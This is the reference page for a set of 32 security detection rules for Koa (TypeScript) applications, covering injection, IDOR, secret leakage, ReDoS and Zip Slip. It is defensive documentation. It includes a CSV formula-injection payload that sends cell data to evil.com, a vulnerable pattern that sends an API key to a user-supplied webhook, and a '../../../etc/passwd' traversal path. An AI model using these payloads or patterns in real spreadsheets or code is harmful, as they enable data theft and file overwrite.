# Koa (TypeScript) Security

Security vulnerabilities and detection rules for koa framework. 32 rules across 23 CWE categories.

- Total rules: 32
- CWE categories: 23
- Critical rules: 10

## CWEs

- **CWE-798**: Use of Hard-coded Credentials
- **CWE-639**: Authorization Bypass Through User-Controlled Key
- **CWE-20**: Improper Input Validation
- **CWE-22**: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
- **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
- **CWE-1321**: Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
- **CWE-78**: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
- **CWE-79**: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- **CWE-89**: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- **CWE-93**: Improper Neutralization of CRLF Sequences ('CRLF Injection')
- **CWE-113**: Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Response Splitting')
- **CWE-176**: Improper Handling of Unicode Encoding
- **CWE-201**: Insertion of Sensitive Information Into Sent Data
- **CWE-208**: Observable Timing Discrepancy
- **CWE-287**: Improper Authentication
- **CWE-391**: Unchecked Error Condition
- **CWE-532**: Insertion of Sensitive Information into Log File
- **CWE-601**: URL Redirection to Untrusted Site ('Open Redirect')
- **CWE-636**: Not Failing Securely ('Failing Open')
- **CWE-670**: Always-Incorrect Control Flow Implementation
- **CWE-1069**: Empty Exception Block
- **CWE-1236**: Improper Neutralization of Formula Elements in a CSV File
- **CWE-1333**: Inefficient Regular Expression Complexity

## Rules

- **Business Logic Input Validation** [MEDIUM]: Detects business-critical values (discount, refund, quantity) used without validation.
- **Command Injection via child_process** [CRITICAL]: Detects user input flowing to shell command execution functions.
- **CSV Injection (Formula Injection)** [MEDIUM]: Detects untrusted data being placed into CSV output, which can enable formula injection
when the CSV is opened in spreadsheet software like Excel or Google Sheets.

CSV injection occurs when user-controlled data containing formula characters (=, +, -, @, \t, \r)
is written to a CSV file without proper escaping. When opened in spreadsheet software,
these formulas can execute arbitrary commands or exfiltrate data.

Example attack payload: =HYPERLINK("http://evil.com/"&A1, "Click")
This would create a clickable link that sends the contents of cell A1 to the attacker.
- **Email Header Injection** [HIGH]: Detects email header injection vulnerabilities where user input flows into
email headers (To, From, Subject, Cc, Bcc) without validation. Attackers can
inject CRLF sequences (\r\n) to add arbitrary headers or body content.

Attack impact:
- Send spam/phishing emails via your server
- Add hidden recipients (Cc/Bcc injection)
- Modify email content
- Bypass spam filters using your domain reputation

Common vulnerable patterns:
- nodemailer with user-controlled options
- SendGrid/Mailgun APIs with user input
- Custom SMTP implementations
- **Empty Catch Block** [MEDIUM]: Detects empty catch blocks that silently swallow exceptions without
any error handling, logging, or recovery logic.

Empty catch blocks hide errors and make debugging extremely difficult.
They can mask security issues, data corruption, and system failures.
- **Hardcoded Secret in Environment Variable Fallback** [HIGH]: Detects hardcoded secrets used as fallback values for environment variables.

Pattern: `process.env.SECRET || 'hardcoded-value'`

This is dangerous because:
- If the environment variable is not set, the hardcoded value is used
- Developers often forget to set env vars in production
- The hardcoded fallback may be committed to version control
- Creates false sense of security ("we use env vars")

This is particularly common with:
- JWT secrets
- API keys
- Database passwords
- Encryption keys
- **Environment Variable Secret Exposure** [HIGH]: Detects when environment variables (which may contain secrets like API keys,
passwords, tokens) are leaked through logging, HTTP responses, or external requests.

Environment variables commonly store sensitive data:
- API keys (AWS_ACCESS_KEY_ID, STRIPE_SECRET_KEY)
- Database passwords (DB_PASSWORD, DATABASE_URL)
- JWT secrets (JWT_SECRET)
- OAuth tokens (GITHUB_TOKEN, SLACK_TOKEN)

Leaking these values exposes credentials and allows unauthorized access.

This rule uses taint flow analysis to detect when process.env flows to:
- Logging functions (console.log, winston, etc.)
- HTTP responses (res.send, res.json)
- External HTTP requests
- Client-side code (sent to browser)
- **Failing Open on Security Check Errors** [CRITICAL]: Detects security checks (authentication, authorization, validation) that grant
access when an error occurs instead of denying it. This is a critical security
flaw where the system "fails open" rather than "failing closed/secure".

When authentication or authorization checks encounter errors, the system should
DENY access by default, not grant it.
- **Hardcoded Credentials** [HIGH]: Detects hardcoded credentials (passwords, API keys, tokens) in database connections
and configuration objects. Credentials should be loaded from environment variables
or secure secret management systems.

This is different from CWE-259 (weak password):
- CWE-798: Any credential hardcoded in source code (security risk)
- CWE-259: Specifically weak/guessable passwords

Even a "strong" password is a security risk if hardcoded because:
- It gets committed to version control
- It's difficult to rotate
- It may leak via logs, error messages, or decompilation
- No separation between dev/prod environments
- **Hardcoded High-Entropy Secrets Detection** [CRITICAL]: Detects hardcoded secrets with high entropy (randomness) that indicate real credentials.

This rule uses entropy analysis to avoid false positives from:
- Example/placeholder values ("keyboard cat", "your-secret-here")
- Test fixtures ("test123", "fake-api-key")
- Short/simple strings ("secret", "password")

Only flags strings that appear to be REAL secrets:
- High entropy (random-looking characters)
- Sufficient length (20+ characters for API keys)
- Known secret patterns (AWS keys, JWT tokens, private keys)

Hardcoded real secrets pose security risks:
- Exposure in version control
- Difficult credential rotation
- Accidental disclosure in logs/errors
- No dev/prod separation
- **Hardcoded Secrets in Security Operations** [CRITICAL]: Detects hardcoded secrets (API keys, tokens, passwords) flowing into security-sensitive
operations. Uses taint analysis to track hardcoded secret strings from their definition
to actual usage in authentication, API calls, or cryptographic operations.

This approach reduces false positives by only flagging secrets that are actually used,
not just defined in comments, examples, or unused variables.
- **HTTP Header Injection (Response Splitting)** [HIGH]: Detects user input flowing into HTTP response headers without CRLF sanitization.
- **Horizontal Privilege Escalation** [CRITICAL]: Detects when user-controlled input is used to access resources belonging to other users
at the same privilege level without verifying ownership.
- **Insecure Direct Object Reference (IDOR)** [HIGH]: Detects when user-controlled input (from URL parameters, query strings, or request body)
is used directly to access database records without verifying that the authenticated
user has permission to access that specific resource.

IDOR vulnerabilities allow attackers to access, modify, or delete resources belonging
to other users by manipulating identifiers in requests.
- **Potential IDOR - Generic Data Access** [MEDIUM]: Detects endpoints where route parameters flow to generic data access patterns
(Map.get, object property access, cache lookups, custom repositories) without
visible ownership verification in the function.

This rule catches patterns that ORM-specific detection misses, but requires
human verification that authorization is not enforced elsewhere (middleware,
decorators, API gateway, etc.).

**This is a "potential" finding - verify authorization exists somewhere.**
- **JWT Decode Used for User Identity (Authentication Bypass)** [CRITICAL]: Detects when jwt.decode() output is used for user identity, allowing complete authentication bypass since decode() does not verify signatures.
- **Open Redirect via Untrusted URLs** [MEDIUM]: Detects user input flowing into redirect functions without URL validation.
- **Path Traversal in File Operations** [CRITICAL]: Detects untrusted user input used in file system operations without proper validation.
This can allow attackers to read or write arbitrary files on the server.
- **Prototype Pollution via Object Manipulation** [HIGH]: Detects user input flowing to object merge operations without filtering dangerous keys.
- **Prototype Pollution Gadget - Unsafe Property Trust** [MEDIUM]: Detects authorization checks that trust properties without verifying they are own properties.
- **Regular Expression Denial of Service (ReDoS)** [HIGH]: Detects potentially catastrophic regular expressions that could lead to ReDoS attacks.

ReDoS occurs when regular expressions with certain patterns cause exponential backtracking,
leading to excessive CPU consumption. Evil regexes typically contain:

1. Nested quantifiers (e.g., (a+)+, (a*)*)
2. Alternation with overlapping patterns (e.g., (a|ab)*, (a|a)*)
3. Grouping with repetition where the group can match the same input in multiple ways
4. Complex patterns with overlapping possibilities that cause catastrophic backtracking

When user input is matched against these patterns, an attacker can craft input that
causes the regex engine to take exponential time, effectively causing a denial of service.
- **Sensitive Data Exposure in Logs** [MEDIUM]: Detects when user-provided sensitive data (passwords, tokens, API keys, secrets, etc.)
flows directly into logging functions without proper redaction or masking.

This rule uses taint flow analysis to detect ACTUAL sensitive data being logged,
not just variables with sensitive names. Only triggers when:
1. Data originates from user input (req.body, req.headers, etc.)
2. Contains sensitive field names (password, token, secret, etc.)
3. Flows into logging functions without sanitization

Sensitive data in logs can lead to:
- Credential exposure in log files or monitoring systems
- Unauthorized access if logs are compromised
- Compliance violations (PCI-DSS, GDPR, HIPAA)
- Data breaches through log aggregation systems
- **Sensitive Field Exposure in API Response** [CRITICAL]: Detects when sensitive data fields (passwords, tokens, secrets, API keys) are
exposed through API endpoint responses. This commonly happens when:

1. Mapping user data with sensitive fields: `.map(u => ({ password: u.password }))`
2. Returning entire user objects: `res.json(user)` where user has password field
3. Including sensitive fields in response objects: `res.json({ password: user.password })`

This is particularly dangerous when AI-generated code returns user collections
without filtering sensitive fields, as in debug endpoints or admin panels.

Security Impact:
- Password hash exposure enabling offline cracking attacks
- API key/token leakage allowing account takeover
- Session token exposure enabling session hijacking
- PII disclosure violating privacy regulations (GDPR, CCPA)
- **SQL Injection via Database Queries** [CRITICAL]: Detects user input flowing into SQL queries without parameterization.
- **Timing Attack via Direct Cryptographic Comparison** [MEDIUM]: Detects direct string comparison of cryptographic values (HMAC, signatures, hashes)
where timing attacks are practically exploitable.

This rule focuses on HIGH-RISK patterns where timing attacks have been demonstrated
in real-world attacks:
- HMAC/signature verification (webhook signatures, JWT manual verification)
- Hash comparison (when verifying pre-computed hashes)

NOT flagged (low practical risk over network):
- Password comparison: Network jitter (ms) overwhelms timing differences (ns).
  The real fix is using bcrypt/argon2 which handles this automatically.
- General token comparison: Usually better addressed by secure token generation
  and proper session management.

Timing attacks on cryptographic comparisons are practical because:
1. Attacker controls the input format exactly
2. Signatures have known structure (hex/base64)
3. Can be automated with statistical analysis
4. Have been used in real attacks (GitHub, Slack webhook bypasses)
- **JavaScript Test with Trivial Always-Passing Assertion** [MEDIUM]: Detects JavaScript test functions that only contain trivial assertions or no assertions at all.
These tests provide no actual validation and give false confidence about code correctness.
Common patterns include expect(true).toBe(true), assert(true), or tests with only comments.
- **Unhandled Promise Rejection** [HIGH]: Detects promises that are created or called without proper rejection handlers.
Unhandled promise rejections can cause application crashes, expose sensitive error
information, and lead to inconsistent application state.

In Node.js, unhandled promise rejections will terminate the process in future versions,
making this a critical reliability and security issue.
- **Unicode Normalization Security Issues** [MEDIUM]: Detects missing Unicode normalization in security-sensitive string comparisons.
Unicode allows multiple representations of visually identical characters, which
attackers can exploit to bypass input validation, authentication, or access control.

Common attack vectors:
- Homograph attacks (using lookalike characters): "аdmin" vs "admin" (Cyrillic 'а')
- Case folding differences: "ß" (German sharp s) becomes "SS" when uppercased
- Combining characters: "é" can be a single char or 'e' + combining accent
- Full-width characters: "ａｄｍｉｎ" vs "admin"

Always normalize Unicode strings using String.prototype.normalize() before
security-sensitive comparisons.
- **Unvalidated Business-Critical Values** [HIGH]: Detects business-critical values from user input used without validation.
- **Credential Exfiltration via User-Controlled Endpoint** [CRITICAL]: Detects when internal credentials (API keys, secrets, tokens) are sent in HTTP requests
to user-controlled endpoints. This allows attackers to exfiltrate server credentials
by providing a malicious webhook URL that captures the sensitive headers or body data.

Example vulnerable pattern:
```javascript
// User controls 'endpoint' from request
const endpoint = req.body.webhookUrl;

// Server sends its internal API key to attacker-controlled URL
await fetch(endpoint, {
  headers: { 'X-API-Key': process.env.INTERNAL_API_KEY }
});
```

This is different from standard SSRF (which accesses internal resources) - here the attacker
exfiltrates server credentials to their own controlled endpoint.
- **Cross-Site Scripting (XSS) via Response** [HIGH]: Detects user input flowing into HTTP responses without proper encoding or sanitization.
- **Zip Slip Path Traversal** [HIGH]: Detects unsafe extraction of zip/tar archives without path validation,
which can lead to arbitrary file writes via path traversal (Zip Slip).

Zip Slip is a form of path traversal attack where a malicious archive contains
entries with paths like "../../../etc/passwd" that escape the intended extraction
directory and overwrite arbitrary files on the system.

Vulnerable patterns:
1. Extracting zip entries without validating the extracted path
2. Not checking if extracted path is inside target directory
3. Trusting entry.fileName from the archive
4. Not normalizing/resolving paths before extraction

Impact:
- Arbitrary file overwrite (RCE if overwriting .bashrc, cron jobs, etc.)
- Configuration tampering
- Code injection (overwriting source files)
- Data exfiltration (overwriting log files)